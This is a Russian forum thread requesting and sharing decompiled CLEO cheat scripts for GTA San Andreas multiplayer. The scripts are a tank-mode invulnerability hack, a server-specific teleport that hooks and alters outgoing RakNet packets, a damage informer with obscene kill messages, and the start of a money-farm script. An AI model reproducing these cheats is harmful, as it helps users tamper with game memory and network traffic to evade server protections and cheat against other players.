Декомпиляция скриптов

FYP

Известный
Автор темы
Администратор
1,763
5,906
GVWUrNJ.png
eNo5cSj.png


Общая тема для просьб о помощи в декомпиляциии и декриптованиии скриптов, плагинов и приложений.
Запрещено просить о декомпиляции/декриптовании софта, выставленного на продажу на нашем сайте.

Рекомендации:
  1. Сначала воспользуйтесь поиском по теме и по форуму, возможно его в декомпилированном виде или с исходным кодом уже выкладывали у нас на сайте.
  2. Попытайтесь декомпилировать самостоятельно: CLEO - декриптор, декомпилятор; AHK - распаковщик .exe; LuaJIT - декомпилятор1, декомпилятор2.
  3. Просить о декомпиляции .asi, .sf, .dll, .exe почти бесполезно, часто такие просьбы остаются без ответа и вряд ли вам это что-то даст. Можете попробовать сами, IDA Pro или Ghidra к вашим услугам.
    • Это не касается .exe, которые являются скомпилированными AutoHotKey-скриптами (.ahk).
  4. Добавьте название скрипта к сообщению, если оно известно - это поможет другим пользователям найти его с помощью поиска.
  5. Сообщения по типу "спасибо, помог" по правилам форума считаются флудом и скорее всего будут удалены. Если вам помогли, вы можете нажать кнопку Мне нравится под ответом - это даст понять, что ответ верный.
 
Последнее редактирование:

™ ChipFamily

По ту сторону надежды.
5,144
1,983
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
CLEO:
// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
{$CLEO .cs}

//-------------MAIN---------------
0@ = -18164
gosub 0@
0662: printstring "CLEO : Tank Mode"
0662: printstring "gcode: acheats.ru : blasthack.net"
thread "tankmode"

:Label000054
wait 0
if and
   Actor.Driving($0[3])
key_down 76
jf @Label000144
30@ = Actor.CurrentCar($0[3])
01EC: make_car 30@ very_heavy 1
053F: set_car 30@ tires_vulnerability 0
03F5: set_car 30@ apply_damage_rules 0
Car.SetImmunities(30@, 1, 1, 1, 1, 1)
0A8C: write_memory 9867620 size 1 value 1 virtual_protect 0
Actor.SetImmunities($0[3], 1, 1, 1, 1, 1)
08C6: set_actor $0[3] stay_on_bike 1
Actor.StorePos($0[3], 28@, 27@, 26@)
if
0AE2: 29@ = random_vehicle_near_point 28@ 27@ 26@ in_radius 10.0 find_next 0 pass_wrecked 0 //IF and SET
jf @Label000144
if
803B:   not  29@ == 30@ // (int)
jf @Label000105
099A: set_car 29@ collision_detection 0

:Label000105
0AE2: 29@ = random_vehicle_near_point 28@ 27@ 26@ in_radius 10.0 find_next 1 pass_wrecked 0 //IF and SET
jf @Label000144
if
803B:   not  29@ == 30@ // (int)
jf @Label00013D
099A: set_car 29@ collision_detection 0

:Label00013D
goto @Label000105

:Label000144
if and
   not key_down 76
056D:   actor $0[3] defined
jf @Label000240
if
   Actor.Driving($0[3])
jf @Label0001B7
30@ = Actor.CurrentCar($0[3])
01EC: make_car 30@ very_heavy 0
Actor.SetImmunities($0[3], 0, 0, 0, 0, 0)
053F: set_car 30@ tires_vulnerability 1
08C6: set_actor $0[3] stay_on_bike 0
03F5: set_car 30@ apply_damage_rules 1
Car.SetImmunities(30@, 0, 0, 0, 0, 0)
0A8C: write_memory 9867620 size 1 value 0 virtual_protect 0

:Label0001B7
Actor.StorePos($0[3], 28@, 27@, 26@)
if
0AE2: 29@ = random_vehicle_near_point 28@ 27@ 26@ in_radius 150.0 find_next 0 pass_wrecked 0 //IF and SET
jf @Label000240
if
803B:   not  29@ == 30@ // (int)
jf @Label000201
099A: set_car 29@ collision_detection 1

:Label000201
0AE2: 29@ = random_vehicle_near_point 28@ 27@ 26@ in_radius 150.0 find_next 1 pass_wrecked 0 //IF and SET
jf @Label000240
if
803B:   not  29@ == 30@ // (int)
jf @Label000239
099A: set_car 29@ collision_detection 1

:Label000239
goto @Label000201

:Label000240
goto @Label000054
 

™ ChipFamily

По ту сторону надежды.
5,144
1,983
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
CLEO:
// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
{$CLEO .cs}

//-------------MAIN---------------
0000: NOP
0662: printstring "Телепорт на метку: Pears Project"
0662: printstring "Автор: Ded_Fedot"
0662: printstring "Контакты: vk.com/idedfedot"

:Label000058
wait 0
   SAMP.Available
else_jump @Label000058
alloc 12@ 128
SAMP.GetCurrentServerAddress(12@, 13@)
if or
0C14: strcmp string1 12@ string2 "176.32.37.62"
0C14: strcmp string1 12@ string2 "176.32.39.34"
0C14: strcmp string1 12@ string2 "176.32.37.63"
else_jump @Label0001C1
chatmsg "{00CDFF}[Pears Project] {DBDBDB}Телепорт на метку" -1
chatmsg "{00CDFF}[Pears Project] {DBDBDB}Активация: {FFE662}/pptp" -1
chatmsg "{00CDFF}[Pears Project] {DBDBDB}Автор: {00D632}Ded_Fedot" -1
jump @Label0001C3

:Label0001C1
0A93: end_custom_thread

:Label0001C3
free 12@
0B34: samp register_client_command "pptp" to_label @Label000735
0BE2: raknet setup_outcoming_packet_hook @Label00064E
2@ = 0
9@ = 0
10@ = 0

:Label00023C
wait 0
if and
   not Actor.Driving($PLAYER_ACTOR)
  9@ == 1
else_jump @Label00042E
0AB6: store_target_marker_coords_to 5@ 6@ 7@ // IF and SET
2@ = 1
10@ = 0
wait 228
04E4: refresh_game_renderer_at 5@ 6@
Camera.SetAtPos(5@, 6@, 7@)
02CE: 7@ = ground_z_at 5@ 6@ 999.0
Actor.PutAt($PLAYER_ACTOR, 5@, 6@, 7@)
wait 0
2@ = 0
9@ = 0
print "~r~Successfully! ~n~~w~Teleport by ~g~Ded_Fedot" 3000
018C: play_sound 1139 at 0.0 0.0 0.0

:Label00042E
if and
0AB6: store_target_marker_coords_to 5@ 6@ 7@ // IF and SET
   Actor.Driving($PLAYER_ACTOR)
  10@ == 1
else_jump @Label000647
2@ = 1
9@ = 0
wait 228
04E4: refresh_game_renderer_at 5@ 6@
Camera.SetAtPos(5@, 6@, 7@)
02CE: 7@ = ground_z_at 5@ 6@ 999.0
Actor.PutAt($PLAYER_ACTOR, 5@, 6@, 7@)
wait 0
2@ = 0
10@ = 0
print "~r~Successfully! ~n~~w~Teleport by ~g~Ded_Fedot" 3000
11@ = Actor.CurrentCar($PLAYER_ACTOR)
07D5: set_car 11@ velocity_in_direction_XYZ 0.0 0.0 0.1 rotation_velocitiesXY 0.0 0.0 unk 0.0
018C: play_sound 1139 at 0.0 0.0 0.0

:Label000647
jump @Label00023C

:Label00064E
if
  2@ == 1
else_jump @Label000731
0BE5: raknet 3@ = get_hook_param 1
if
  3@ == 207
else_jump @Label000731
0BE5: raknet 3@ = get_hook_param 0
4@ = BitStream.GetDataPtr(3@)
0C0D: struct 4@ offset 39 size 4 = -1.0
0BE0: raknet hook_ret 1

:Label000731
0BE0: raknet hook_ret 1

:Label000735
if
0AB6: store_target_marker_coords_to 5@ 6@ 7@ // IF and SET
else_jump @Label000760
9@ = 1
10@ = 1
jump @Label000835

:Label000760
print "~w~Marker not ~r~found" 2000
018C: play_sound 1138 at 0.0 0.0 0.0
9@ = 0
10@ = 0

:Label000835
SAMP.CmdRet
 
  • Нравится
Реакции: #kerosin

DarkL1ght

Новичок
252
112
CLEO:
// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
{$CLEO .cs}

//-------------MAIN---------------
0000: NOP

:Label000011
   not SAMP.Available
else_jump @Label000025
wait 100
jump @Label000011

:Label000025
0B34: samp register_client_command "q3" to_label @Label00102D
32@ = 1201
33@ = 1201
28@ = 1
27@ = 1
26@ = 1
25@ = 1
8@ = 0
alloc 29@ 64
0C11: memset destination 29@ value 0 size 64
31@ = Render.CreateFont("Arial Black", 13, 12)
30@ = Render.CreateFont("Arial Black", 9, 13)
0B34: samp register_client_command "dmghelp" to_label @Label0007EF
0B34: samp register_client_command "dmgi" to_label @Label000C92
0B34: samp register_client_command "dmgnames" to_label @Label000D27
0B34: samp register_client_command "dmginc" to_label @Label000DC8
0B34: samp register_client_command "dmgoutc" to_label @Label000E81
0B34: samp register_client_command "dmglol" to_label @Label000F3A
chatmsg "p1cador: {ff0000}DMG Informer 2.0{ffffff}. Иструкция {00BFFF}/dmghelp" 16777215

:Label00014A
wait 0
if
0@ = Audiostream.Load("CLEO\p1_bell.mp3")
else_jump @Label0001AC
log "{ff0000}[p1cador] {fff000}> Audio Loaded!"
jump @Label000220
jump @Label000219

:Label0001AC
chatmsg "p1cador: {ff0000}DMG Informer 2.0{ffffff}. Аудиофайл {00bfff}p1_bell.mp3 {ff0000}не загружен" 16777215
jump @Label000220

:Label000219
jump @Label00014A

:Label000220
0BE1: raknet setup_outcoming_rpc_hook @Label0006EC

:Label000227
wait 0

:Label00022B
  28@ == 0
else_jump @Label000244
wait 100
jump @Label00022B

:Label000244
if and
  14@ >= 1
  25@ == 1
else_jump @Label00032C
if
   not 32@ > 1200
else_jump @Label000318
0B60: convert_game_screen_coords 415.0 16@ to_window_screen_coords 18@ 20@
call @Label0003F4 12 29@ 31@ 18@ 20@ 6275328 14@ 10@ 6@ 22@ 24@ 3@ 8@ 22@ 24@
0B60: convert_game_screen_coords 415.0 182.0 to_window_screen_coords 18@ 20@
if
  27@ == 1
else_jump @Label0002F9
call @Label0005EA 7 29@ 30@ 18@ 20@ 12@ 255 10@

:Label0002F9
14@ -= 2
16@ -= 0.3
32@ += 1
jump @Label00032C

:Label000318
free 10@
free 6@
free 14@
free 16@

:Label00032C
if and
  15@ >= 1
  26@ == 1
else_jump @Label0003ED
if
   not 33@ > 1200
else_jump @Label0003ED
0B60: convert_game_screen_coords 240.0 17@ to_window_screen_coords 19@ 21@
call @Label000636 8 29@ 31@ 19@ 21@ 12255232 15@ 11@ 7@
0B60: convert_game_screen_coords 240.0 182.0 to_window_screen_coords 19@ 21@
if
  27@ == 1
else_jump @Label0003D5
call @Label00067E 8 29@ 30@ 19@ 21@ 13@ 255 11@ 23@ 23@

:Label0003D5
15@ -= 2
17@ -= 0.2
33@ += 1

:Label0003ED
jump @Label000227

:Label0003F4
0B66: render argb 4@ to_a 15@ r 16@ g 17@ b 18@
15@ = SAMP.GetActorHandleByPlayerID(6@)
if or
001D:   9@ > 6@ // (int)
001D:   6@ > 9@ // (int)
else_jump @Label00042F
8@ = 1

:Label00042F
if and
   Actor.Dead(15@)
  11@ == 1
else_jump @Label000550
if
  10@ == 1
else_jump @Label000475
format 0@ "{b60000}ОПУЩЕН"
jump @Label000549

:Label000475
if
  10@ == 2
else_jump @Label0004A4
format 0@ "{b60000}ВЫЕБАН"
jump @Label000549

:Label0004A4
if
  10@ == 3
else_jump @Label0004D4
format 0@ "{b60000}ОБОССАН"
jump @Label000549

:Label0004D4
if
  10@ == 4
else_jump @Label000503
format 0@ "{b60000}УНИЖЕН"
jump @Label000549

:Label000503
if
  10@ == 5
else_jump @Label000533
format 0@ "{b60000}ОБОСРАН"
jump @Label000549

:Label000533
format 0@ "{b60000}ВЫЕБАН"

:Label000549
jump @Label0005AA

:Label000550
if
   SAMP.IsPlayerPaused(6@)
else_jump @Label00058A
16@ = 255
17@ = 255
18@ = 255
format 0@ "afk"
jump @Label0005AA

:Label00058A
format 0@ "%.1f {bb0000}(x%d)" 7@ 8@

:Label0005AA
0B67: render a 5@ r 16@ g 17@ b 18@ to_argb 19@
20@ = Render.FontDrawLength(1@, 0@)
0062: 2@ -= 20@ // (int)
Render.DrawText(1@, 0@, 2@, 3@, 19@)
ret 2 8@ 6@

:Label0005EA
15@ = SAMP.GetPlayerNickname(6@)
format 0@ "%s[%d]" 15@ 6@
20@ = Render.FontDrawLength(1@, 0@)
20@ /= 2
0062: 2@ -= 20@ // (int)
Render.DrawText(1@, 0@, 2@, 3@, 4@)
ret 0

:Label000636
0B66: render argb 4@ to_a 15@ r 16@ g 17@ b 18@
0B67: render a 5@ r 16@ g 17@ b 18@ to_argb 19@
format 0@ "-%.2f" 7@
Render.DrawText(1@, 0@, 2@, 3@, 19@)
ret 0

:Label00067E
if
   Actor.Dead($PLAYER_ACTOR)
else_jump @Label00069D
0085: 6@ = 7@ // (int)
jump @Label00069D

:Label00069D
15@ = SAMP.GetPlayerNickname(6@)
format 0@ "%s[%d]" 15@ 6@
20@ = Render.FontDrawLength(1@, 0@)
20@ /= 2
0062: 2@ -= 20@ // (int)
Render.DrawText(1@, 0@, 2@, 3@, 4@)
ret 1 6@

:Label0006EC
0BE5: raknet 1@ = get_hook_param 1
if
  1@ == 115
else_jump @Label0007EB
0BE5: raknet 2@ = get_hook_param 0
3@ = BitStream.Read(2@, 1)
4@ = BitStream.Read(2@, 2)
5@ = BitStream.Read(2@, 3)
if
  3@ == 0
else_jump @Label00079D
Audiostream.PerformAction(0@, PLAY)
32@ = 0
0085: 10@ = 4@ // (int)
0087: 6@ = 5@ // (float)
12@ = SAMP.GetPlayerColor(10@)
14@ = 255
16@ = 174.0
22@ += 1
if
  8@ == 1
else_jump @Label000796
0209: 3@ = random_int_in_ranges 1 6

:Label000796
jump @Label0007E0

:Label00079D
if
  3@ == 1
else_jump @Label0007E0
33@ = 0
0085: 11@ = 4@ // (int)
0087: 7@ = 5@ // (float)
13@ = SAMP.GetPlayerColor(11@)
15@ = 255
17@ = 174.0

:Label0007E0
0BE0: raknet hook_ret 1
jump @Label0007EF

:Label0007EB
0BE0: raknet hook_ret 1

:Label0007EF
chatmsg " " 16777215
chatmsg "============== {ff0000}DMG Informer 2.0{ffffff} ============" 16777215
chatmsg "Перед тем, как пиздеть, что колокольчик не звинит" 16777215
chatmsg "Включи звук радио и перезайди в игру." 16777215
chatmsg ".mp3 файл должен лежать в папке клео и иметь название p1_bell.mp3" 16777215
chatmsg " " 16777215
if
  28@ == 1
else_jump @Label00092B
06D2: 9@v = "{00ff00}вкл" // @v = string
jump @Label00093E

:Label00092B
06D2: 9@v = "{ff0000}выкл" // @v = string

:Label00093E
chatmsg "{ff0000}/dmgi {ffffff}- вкл/выкл {00BFFF}весь скрипт{ffffff} (сейчас: %s{ffffff})" 16777215 9@v
if
  26@ == 1
else_jump @Label0009C7
06D2: 9@v = "{00ff00}вкл" // @v = string
jump @Label0009DA

:Label0009C7
06D2: 9@v = "{ff0000}выкл" // @v = string

:Label0009DA
chatmsg "{ff0000}/dmginc {ffffff}- вкл/выкл отображение {00BFFF}получаемого {ffffff}урона (сейчас: %s{ffffff})" 16777215 9@v
if
  25@ == 1
else_jump @Label000A77
06D2: 9@v = "{00ff00}вкл" // @v = string
jump @Label000A8A

:Label000A77
06D2: 9@v = "{ff0000}выкл" // @v = string

:Label000A8A
chatmsg "{ff0000}/dmgoutc {ffffff}- вкл/выкл отображение {00BFFF}нанесенного {ffffff}урона (сейчас: %s{ffffff})" 16777215 9@v
if
  27@ == 1
else_jump @Label000B28
06D2: 9@v = "{00ff00}вкл" // @v = string
jump @Label000B3B

:Label000B28
06D2: 9@v = "{ff0000}выкл" // @v = string

:Label000B3B
chatmsg "{ff0000}/dmgnames {ffffff}- вкл/выкл отображение {00BFFF}ников{ffffff} (сейчас: %s{ffffff})" 16777215 9@v
if
  8@ == 1
else_jump @Label000BCE
06D2: 9@v = "{00ff00}вкл" // @v = string
jump @Label000BE1

:Label000BCE
06D2: 9@v = "{ff0000}выкл" // @v = string

:Label000BE1
chatmsg "{ff0000}/dmglol {ffffff}- вкл/выкл {00BFFF}сообщения при убийстве{ffffff} (сейчас: %s{ffffff})" 16777215 9@v
chatmsg "============== by {ff0000}p1cador {ffffff}================" 16777215
SAMP.CmdRet

:Label000C92
call @Label000FE5 1 28@ 28@
if
  28@ == 1
else_jump @Label000CE3
chatmsg "p1cador: {00FF00}DMG Informer включен" 16777215

:Label000CE3
if
  28@ == 0
else_jump @Label000D25
chatmsg "p1cador: {FF0000}DMG Informer выключен" 16777215

:Label000D25
SAMP.CmdRet

:Label000D27
call @Label000FE5 1 27@ 27@
if
  27@ == 1
else_jump @Label000D7E
chatmsg "p1cador: отображение ников {00ff00}включено" 16777215

:Label000D7E
if
  27@ == 0
else_jump @Label000DC6
chatmsg "p1cador: отображение ников {ff0000}отключено" 16777215

:Label000DC6
SAMP.CmdRet

:Label000DC8
call @Label000FE5 1 26@ 26@
if
  26@ == 1
else_jump @Label000E2B
chatmsg "p1cador: отображение получаемого урона {00ff00}включено" 16777215

:Label000E2B
if
  26@ == 0
else_jump @Label000E7F
chatmsg "p1cador: отображение получаемого урона {ff0000}отключено" 16777215

:Label000E7F
SAMP.CmdRet

:Label000E81
call @Label000FE5 1 25@ 25@
if
  25@ == 1
else_jump @Label000EE4
chatmsg "p1cador: отображение нанесенного урона {00ff00}включено" 16777215

:Label000EE4
if
  25@ == 0
else_jump @Label000F38
chatmsg "p1cador: отображение нанесенного урона {ff0000}отключено" 16777215

:Label000F38
SAMP.CmdRet

:Label000F3A
call @Label000FE5 1 8@ 8@
if
  8@ == 1
else_jump @Label000F96
chatmsg "p1cador: сообщения при убийстве {00FF00}включены" 16777215

:Label000F96
if
  8@ == 0
else_jump @Label000FE3
chatmsg "p1cador: сообщения при убийстве {FF0000}выключены" 16777215

:Label000FE3
SAMP.CmdRet

:Label000FE5
if
  0@ == 1
else_jump @Label001005
0@ = 0
jump @Label001025

:Label001005
if
  0@ == 0
else_jump @Label001025
0@ = 1
jump @Label001025

:Label001025
ret 1 0@

:Label00102D
free 29@
Render.ReleaseFont(31@)
Render.ReleaseFont(30@)
run "q3.CS"
0A93: end_custom_thread
SAMP.CmdRet
ХЗ можешь так
CLEO:
{$CLEO} 
{$INCLUDE SF}   
0000:

while not SAMP.Available()
wait 100
end


0B34: samp register_client_command "q3" to_label @p1_reload 

//10@ = 339.0
//11@ = 174.0
32@ = 1201
33@ = 1201

28@ = 1
27@ = 1
26@ = 1
25@ = 1
8@ = 0

//alloc 2@ 64
alloc 29@ 64
//0C11: memset destination 2@ value 0 size 64
0C11: memset destination 29@ value 0 size 64
0B6D: render 31@ = create_font "Arial Black" height 13 flags 12  //DAMAGE
0B6D: render 30@ = create_font "Arial Black" height 9 flags 13   //Nickname



0B34: samp register_client_command "dmghelp" to_label @p1_dmghelp
0B34: samp register_client_command "dmgi" to_label @p1_dmg_global               //28@ == 1 
0B34: samp register_client_command "dmgnames" to_label @p1_dmgnames             //27@ == 1
0B34: samp register_client_command "dmginc" to_label @p1_dmginc                 //26@ == 1
0B34: samp register_client_command "dmgoutc" to_label @p1_dmgoutc               //25@ == 1 
0B34: samp register_client_command "dmglol" to_label @p1_dmglol         //8@ == 0



0AF8: samp add_message_to_chat "p1cador: {ff0000}DMG Informer 2.0{ffffff}. Иструкция {00BFFF}/dmghelp" color 0xffffff
while true
    wait 0
    if 0AAC: 0@ = load_audiostream "CLEO\p1_bell.mp3"  
        then        
        0B78: log "{ff0000}[p1cador] {fff000}> Audio Loaded!"
        break
        else
        0AF8: samp add_message_to_chat "p1cador: {ff0000}DMG Informer 2.0{ffffff}. Аудиофайл {00bfff}p1_bell.mp3 {ff0000}не загружен" color 0xffffff
        break
    end
end  




/*while true
    wait 100
    if 0B61: samp is_local_player_spawned
        then
        0B2B: samp 24@ = get_player_id_by_actor_handle $PLAYER_ACTOR
        break
    end
end  */


0BE1: raknet setup_outcoming_rpc_hook @outRPC


while true
    wait 0
   
    while 28@ == 0
        wait 100
    end
           
    if and
    0029:   14@ >= 1
    25@ == 1
   
        then
        if 32@ <= 1200 //0->1200
            then                 
            0B60: convert_game_screen_coords 415.0 16@  to_window_screen_coords 18@ 20@           
            0AB1: call_scm_func @OUTC_DMG_RENDER 12 text0 29@ font1 31@ posX_2 18@ posY_3 20@ color4 0x5fc100 alpha5 14@ id6 10@ dmg7 6@ popad8 22@ last_id9 24@ rand10 3@ killmsg11 8@ | last_pop0 22@ last_id1 24@
            0B60: convert_game_screen_coords 415.0 182.0  to_window_screen_coords 18@ 20@
            if 27@ == 1
                then           
                0AB1: call_scm_func @OUTC_NICKNAME_RENDER 7 text0 29@ font1 30@ posX_2 18@ posY_3 20@ color4 12@ alpha5 255 id6 10@
            end
            14@ -= 2
            16@ -= 0.3
            32@ += 1 
            else
            free 10@
            free 6@
            free 14@
            free 16@          
        end
    end
     
    if and
    0029:   15@ >= 1
    26@ == 1
        then       
        if 33@ <= 1200
            then    
            0B60: convert_game_screen_coords 240.0 17@  to_window_screen_coords 19@ 21@ 
            0AB1: call_scm_func @INC_DMG_RENDER 8 text0 29@ font1 31@ posX_2 19@ posY_3 21@ color4 0xbb0000 /*13@*/ alpha5 15@ id6 11@ dmg7 7@
            0B60: convert_game_screen_coords 240.0 182.0  to_window_screen_coords 19@ 21@
            if 27@ == 1
            then
            0AB1: call_scm_func @INC_NICKNAMES_RENDER 8 text0 29@ font1 30@ posX_2 19@ posY_3 21@ color4 13@ alpha5 255 id6 11@ last_id7 23@ | last_id 23@ 
            end
            15@ -= 2
            17@ -= 0.2
            33@ += 1                                                                                                          
        end
    end  
end

:OUTC_DMG_RENDER
0B66: render argb 4@ to_a 15@ r 16@ g 17@ b 18@
0B20: samp 15@ = actor_handle_by_samp_player_id 6@

if or
001d: 9@ > 6@           //если ид предыдущей цели
001d: 6@ > 9@           //не равен иду теущей цели
    then    8@ = 1      //обнулить счетчик попаданий
end

//0AF8: samp add_message_to_chat "%d" color 0x00ff00 10@

if and
Actor.Dead(15@)          
11@ == 1
    then
   // 0AD3: 0@ format "{ff0000}ВЫЕБАН"
    if 10@ == 1
        then
        0AD3: 0@ format "{b60000}ОПУЩЕН"   //purpure 
        else
        if 10@ == 2
            then
            0AD3: 0@ format "{b60000}ВЫЕБАН" //red   
            else
            if 10@ == 3
                then
                0AD3: 0@ format "{b60000}ОБОССАН" //yellow        
                else
                if 10@ == 4               
                    then
                    0AD3: 0@ format "{b60000}УНИЖЕН" //green                
                    else
                    if 10@ == 5
                        then
                        0AD3: 0@ format "{b60000}ОБОСРАН"  //blue                 
                        else 
                        0AD3: 0@ format "{b60000}ВЫЕБАН" //red                         
                    end
                end
            end
        end
    end     
    
    else  
    if Samp.IsPlayerPaused(6@)
        then
        16@ = 255
        17@ = 255
        18@ = 255
        0AD3: 0@ format "afk"
        else
        0AD3: 0@ format "%.1f {bb0000}(x%d)" 7@ 8@
    end
   
end

0B67: render a 5@ r 16@ g 17@ b 18@ to_argb 19@
0B6B: render 20@ = font 1@ draw_text 0@ length
0062: 2@ -= 20@
0B6F: render font 1@ draw_text 0@ pos 2@ 3@ color 19@
0AB2: ret 2 8@ 6@

:OUTC_NICKNAME_RENDER
0B36: samp 15@ = get_player_nickname 6@
0AD3: 0@ format "%s[%d]" 15@ 6@
0B6B: render 20@ = font 1@ draw_text 0@ length
20@ /= 2
0062: 2@ -= 20@ 
0B6F: render font 1@ draw_text 0@ pos 2@ 3@ color 4@
0AB2: ret 0    

:INC_DMG_RENDER
0B66: render argb 4@ to_a 15@ r 16@ g 17@ b 18@
0B67: render a 5@ r 16@ g 17@ b 18@ to_argb 19@

0AD3: 0@ format "-%.2f" 7@
0B6F: render font 1@ draw_text 0@ pos 2@ 3@ color 19@
0AB2: ret 0

:INC_NICKNAMES_RENDER
if Actor.Dead($PLAYER_ACTOR)
    then 0085: 6@ = 7@
    else
end
0B36: samp 15@ = get_player_nickname 6@ 
0AD3: 0@ format "%s[%d]" 15@ 6@
0B6B: render 20@ = font 1@ draw_text 0@ length
20@ /= 2
0062: 2@ -= 20@ 
0B6F: render font 1@ draw_text 0@ pos 2@ 3@ color 4@
0AB2: ret 1 id 6@



:outRPC    
0BE5: raknet 1@ = get_hook_param PARAM_PACKETID
IF 0039: 1@ == RPC_GIVETAKEDAMAGE
    THEN   
    0BE5: raknet 2@ = get_hook_param PARAM_BITSTREAM
    0BE7: raknet 3@ = bit_stream_read 2@ type BS_TYPE_BOOL      //give/take
    0BE7: raknet 4@ = bit_stream_read 2@ type BS_TYPE_SHORT     //Player
    0BE7: raknet 5@ = bit_stream_read 2@ type BS_TYPE_INT       //ammount(FLOAT)
    //0BE7: raknet 6@ = bit_stream_read 2@ type BS_TYPE_INT       //GUN
    //0BE7: raknet 7@ = bit_stream_read 1@ type BS_TYPE_INT       //BodyPart
     if 3@ == 0
        then
        0AAD: set_mp3 0@ perform_action 1        
     
        32@ = 0
        0085: 10@ = 4@ //id
        0087: 6@ = 5@ //dmg 
        0B37: samp 12@ = get_player_color 10@
       
        14@ = 255     //alpha
        16@ = 174.0     //Y
        22@ += 1 //попадания += 1
        if 8@ == 1
            then
            0209: 3@ = random_int_in_ranges 1 6
        end
//===================================       
        else   
//===================================   
        if 3@ == 1
            then           
         
            33@ = 0
            0085: 11@ = 4@ //id
            0087: 7@ = 5@ //dmg
            0B37: samp 13@ = get_player_color 11@
       
            15@ = 255    //alpha
            17@ = 174.0     //Y
        end
    end
    0BE0: raknet hook_ret true
    ELSE 0BE0: raknet hook_ret TRUE 
END




:p1_dmghelp
0AF8: samp add_message_to_chat " " color 0xffffff
0AF8: samp add_message_to_chat "============== {ff0000}DMG Informer 2.0{ffffff} ============" color 0xffffff
0AF8: samp add_message_to_chat "Перед тем, как пиздеть, что колокольчик не звинит" color 0xffffff
0AF8: samp add_message_to_chat "Включи звук радио и перезайди в игру." color 0xffffff
0AF8: samp add_message_to_chat ".mp3 файл должен лежать в папке клео и иметь название p1_bell.mp3" color 0xffffff
0AF8: samp add_message_to_chat " " color 0xffffff
if 28@ == 1
    then
    9@v = "{00ff00}вкл"
    else
    9@v = "{ff0000}выкл"
end
0AF8: samp add_message_to_chat "{ff0000}/dmgi {ffffff}- вкл/выкл {00BFFF}весь скрипт{ffffff} (сейчас: %s{ffffff})" color 0xffffff 9@v
if 26@ == 1
    then
    9@v = "{00ff00}вкл"
    else
    9@v = "{ff0000}выкл"
end
0AF8: samp add_message_to_chat "{ff0000}/dmginc {ffffff}- вкл/выкл отображение {00BFFF}получаемого {ffffff}урона (сейчас: %s{ffffff})" color 0xffffff 9@v
if 25@ == 1
    then
    9@v = "{00ff00}вкл"
    else
    9@v = "{ff0000}выкл"
end
0AF8: samp add_message_to_chat "{ff0000}/dmgoutc {ffffff}- вкл/выкл отображение {00BFFF}нанесенного {ffffff}урона (сейчас: %s{ffffff})" color 0xffffff 9@v 
if 27@ == 1
    then
    9@v = "{00ff00}вкл"
    else
    9@v = "{ff0000}выкл"
end
0AF8: samp add_message_to_chat "{ff0000}/dmgnames {ffffff}- вкл/выкл отображение {00BFFF}ников{ffffff} (сейчас: %s{ffffff})" color 0xffffff 9@v
if 8@ == 1
    then
    9@v = "{00ff00}вкл"
    else
    9@v = "{ff0000}выкл"
end
0AF8: samp add_message_to_chat "{ff0000}/dmglol {ffffff}- вкл/выкл {00BFFF}сообщения при убийстве{ffffff} (сейчас: %s{ffffff})" color 0xffffff 9@v
0AF8: samp add_message_to_chat "============== by {ff0000}p1cador {ffffff}================" color 0xffffff
0b43: samp cmd_ret

:p1_dmg_global
0AB1: call_scm_func @p1_trigger 1 28@ 28@
if 28@ == 1
    then 0AF8: samp add_message_to_chat "p1cador: {00FF00}DMG Informer включен" color 0xffffff
end

if 28@ == 0
    then 0AF8: samp add_message_to_chat "p1cador: {FF0000}DMG Informer выключен" color 0xffffff
end
0b43: samp cmd_ret

:p1_dmgnames
0AB1: call_scm_func @p1_trigger 1 27@ 27@
if 27@ == 1
    then 0AF8: samp add_message_to_chat "p1cador: отображение ников {00ff00}включено" color 0xffffff
end

if 27@ == 0
    then 0AF8: samp add_message_to_chat "p1cador: отображение ников {ff0000}отключено" color 0xffffff
end
0b43: samp cmd_ret


:p1_dmginc
0AB1: call_scm_func @p1_trigger 1 26@ 26@
if 26@ == 1
    then 0AF8: samp add_message_to_chat "p1cador: отображение получаемого урона {00ff00}включено" color 0xffffff
end

if 26@ == 0
    then 0AF8: samp add_message_to_chat "p1cador: отображение получаемого урона {ff0000}отключено" color 0xffffff
end
0b43: samp cmd_ret

:p1_dmgoutc
0AB1: call_scm_func @p1_trigger 1 25@ 25@
if 25@ == 1
    then 0AF8: samp add_message_to_chat "p1cador: отображение нанесенного урона {00ff00}включено" color 0xffffff
end

if 25@ == 0
    then 0AF8: samp add_message_to_chat "p1cador: отображение нанесенного урона {ff0000}отключено" color 0xffffff
end
0b43: samp cmd_ret


:p1_dmglol
0AB1: call_scm_func @p1_trigger 1 8@ 8@
if 8@ == 1
    then 0AF8: samp add_message_to_chat "p1cador: сообщения при убийстве {00FF00}включены" color 0xffffff
end

if 8@ == 0
    then 0AF8: samp add_message_to_chat "p1cador: сообщения при убийстве {FF0000}выключены" color 0xffffff
end
0b43: samp cmd_ret






:p1_trigger
if 0@ == 1
    then
    0@ = 0
    else
    if 0@ == 0
        then
        0@ = 1
        else
    end
end
0AB2: ret 1 0@ 
       
:p1_reload
free 29@
//free 2@
0B6E: render release_font 31@
0B6E: render release_font 30@
0A92: create_custom_thread "q3.CS"
0A93: end_custom_thread
0b43: samp cmd_ret
 
  • Нравится
Реакции: WUSHi

™ ChipFamily

По ту сторону надежды.
5,144
1,983
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
CLEO:
// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
{$CLEO .cs}

//-------------MAIN---------------
0000: NOP
0662: printstring "Farm babla for Pears Project"
0662: printstring "Автор скрипта: Ded_Fedot"
0662: printstring "Контакты: vk.com/idedfedot"

:Label00006B
wait 0
   SAMP.Available
jf @Label00006B
0B34: samp register_client_command "pognali" to_label @Label0002D8
0B34: samp register_client_command "zabablom" to_label @Label00038C
0B34: samp register_client_command "prodat" to_label @Label000395
SAMP.ReadSAMPMemory(6@, 104848, 2)
SAMP.ReadSAMPMemory(8@, 85104, 2)
SAMP.ReadSAMPMemory(9@, 94112, 2)
SAMP.ReadSAMPMemory(10@, 52144, 2)

:Label0000D8
wait 0
if
